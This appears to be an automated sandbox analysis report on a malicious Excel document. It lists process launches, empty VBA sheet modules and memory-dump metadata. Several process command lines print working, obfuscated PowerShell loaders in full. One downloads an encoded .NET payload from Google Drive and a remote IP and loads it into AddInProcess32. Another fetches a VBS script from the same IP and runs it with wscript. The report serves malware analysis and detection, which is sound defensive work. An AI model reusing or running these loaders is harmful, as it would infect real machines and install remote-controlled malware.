                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                    Imagebase:0x13f8f0000
                                                                                    File size:443'392 bytes
                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    Target ID:14
                                                                                    Start time:02:45:37
                                                                                    Start date:24/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
                                                                                    Imagebase:0x13f8f0000
                                                                                    File size:443'392 bytes
                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:15
                                                                                    Start time:02:45:42
                                                                                    Start date:24/10/2024
                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                    Imagebase:0x13f260000
                                                                                    File size:13'824 bytes
                                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:17
                                                                                    Start time:02:45:45
                                                                                    Start date:24/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
                                                                                    Imagebase:0x13f8f0000
                                                                                    File size:443'392 bytes
                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:19
                                                                                    Start time:02:45:46
                                                                                    Start date:24/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
                                                                                    Imagebase:0x13f8f0000
                                                                                    File size:443'392 bytes
                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:20
                                                                                    Start time:02:45:49
                                                                                    Start date:24/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.cmdline"
                                                                                    Imagebase:0x13fa70000
                                                                                    File size:2'758'280 bytes
                                                                                    MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:21
                                                                                    Start time:02:45:49
                                                                                    Start date:24/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FC2.tmp" "c:\Users\user\AppData\Local\Temp\sblybu2m\CSCFEB4FC09456049919CFF236451FA82A.TMP"
                                                                                    Imagebase:0x13f6e0000
                                                                                    File size:52'744 bytes
                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:23
                                                                                    Start time:02:45:55
                                                                                    Start date:24/10/2024
                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
                                                                                    Imagebase:0xfff10000
                                                                                    File size:168'960 bytes
                                                                                    MD5 hash:045451FA238A75305CC26AC982472367
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:24
                                                                                    Start time:02:45:55
                                                                                    Start date:24/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                    Imagebase:0x13f8f0000
                                                                                    File size:443'392 bytes
                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:26
                                                                                    Start time:02:45:57
                                                                                    Start date:24/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
                                                                                    Imagebase:0x13f8f0000
                                                                                    File size:443'392 bytes
                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:27
                                                                                    Start time:02:46:03
                                                                                    Start date:24/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                    Imagebase:0x12f0000
                                                                                    File size:42'056 bytes
                                                                                    MD5 hash:EFBCDD2A3EBEA841996AEF00417AA958
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Call Graph

                                                                                    • Entrypoint
                                                                                    • Decryption Function
                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    • Show Help
                                                                                    callgraph 1 Error: Graph is empty

                                                                                    Module: Sheet1

                                                                                    Declaration
                                                                                    LineContent
                                                                                    1

                                                                                    Attribute VB_Name = "Sheet1"

                                                                                    2

                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                    3

                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                    4

                                                                                    Attribute VB_Creatable = False

                                                                                    5

                                                                                    Attribute VB_PredeclaredId = True

                                                                                    6

                                                                                    Attribute VB_Exposed = True

                                                                                    7

                                                                                    Attribute VB_TemplateDerived = False

                                                                                    8

                                                                                    Attribute VB_Customizable = True

                                                                                    Module: Sheet2

                                                                                    Declaration
                                                                                    LineContent
                                                                                    1

                                                                                    Attribute VB_Name = "Sheet2"

                                                                                    2

                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                    3

                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                    4

                                                                                    Attribute VB_Creatable = False

                                                                                    5

                                                                                    Attribute VB_PredeclaredId = True

                                                                                    6

                                                                                    Attribute VB_Exposed = True

                                                                                    7

                                                                                    Attribute VB_TemplateDerived = False

                                                                                    8

                                                                                    Attribute VB_Customizable = True

                                                                                    Module: Sheet3

                                                                                    Declaration
                                                                                    LineContent
                                                                                    1

                                                                                    Attribute VB_Name = "Sheet3"

                                                                                    2

                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                    3

                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                    4

                                                                                    Attribute VB_Creatable = False

                                                                                    5

                                                                                    Attribute VB_PredeclaredId = True

                                                                                    6

                                                                                    Attribute VB_Exposed = True

                                                                                    7

                                                                                    Attribute VB_TemplateDerived = False

                                                                                    8

                                                                                    Attribute VB_Customizable = True

                                                                                    Module: ThisWorkbook

                                                                                    Declaration
                                                                                    LineContent
                                                                                    1

                                                                                    Attribute VB_Name = "ThisWorkbook"

                                                                                    2

                                                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                    3

                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                    4

                                                                                    Attribute VB_Creatable = False

                                                                                    5

                                                                                    Attribute VB_PredeclaredId = True

                                                                                    6

                                                                                    Attribute VB_Exposed = True

                                                                                    7

                                                                                    Attribute VB_TemplateDerived = False

                                                                                    8

                                                                                    Attribute VB_Customizable = True

                                                                                    Reset < >
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000003.414934139.0000000002340000.00000010.00000800.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_3_2340000_mshta.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                      • Instruction ID: cb9bd332cabbfa30781f40634300193d715712d49588988efc873f45425694ec
                                                                                      • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000003.414934139.0000000002340000.00000010.00000800.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_3_2340000_mshta.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                      • Instruction ID: cb9bd332cabbfa30781f40634300193d715712d49588988efc873f45425694ec
                                                                                      • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000003.414934139.0000000002340000.00000010.00000800.00020000.00000000.sdmp, Offset: 02340000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_3_2340000_mshta.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                      • Instruction ID: cb9bd332cabbfa30781f40634300193d715712d49588988efc873f45425694ec
                                                                                      • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                      • Instruction Fuzzy Hash:

                                                                                      Execution Graph

                                                                                      Execution Coverage:4.5%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:50%
                                                                                      Total number of Nodes:6
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph 2181 7fe899e4b18 2182 7fe899e5a30 URLDownloadToFileW 2181->2182 2184 7fe899e5b00 2182->2184 2177 7fe899e59e1 2178 7fe899e59f1 URLDownloadToFileW 2177->2178 2180 7fe899e5b00 2178->2180

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.446255808.000007FE899E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7fe899e0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: DownloadFile
                                                                                      • String ID:
                                                                                      • API String ID: 1407266417-0
                                                                                      • Opcode ID: d4ec1fa22e562fb5aebe6dad859a9728c5447bf3d4ba4eb253134cf762295389
                                                                                      • Instruction ID: ad9276440b22891a5bb24d439c2bf6839ecb524e2e23749e24ab6d705ed1d9ff
                                                                                      • Opcode Fuzzy Hash: d4ec1fa22e562fb5aebe6dad859a9728c5447bf3d4ba4eb253134cf762295389
                                                                                      • Instruction Fuzzy Hash: 6D317071918A5C8FDB58DF5CD8857A9B7E1FBA9711F00822ED04ED3662CB70A805CB81

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.446255808.000007FE899E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7fe899e0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: DownloadFile
                                                                                      • String ID:
                                                                                      • API String ID: 1407266417-0
                                                                                      • Opcode ID: 33e310c51a2d5861d1d7a805b3fc5fcd832c784f376f1f63ac64545609e4a5ad
                                                                                      • Instruction ID: 17e8683374bc6adbb92050f82b04f152e9277bdf63e82c52da84c8a7dab42562
                                                                                      • Opcode Fuzzy Hash: 33e310c51a2d5861d1d7a805b3fc5fcd832c784f376f1f63ac64545609e4a5ad
                                                                                      • Instruction Fuzzy Hash: D241E27190DB889FDB1ADB6898447F9BBF0FB56321F04826FD089D3162CB646806C782

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
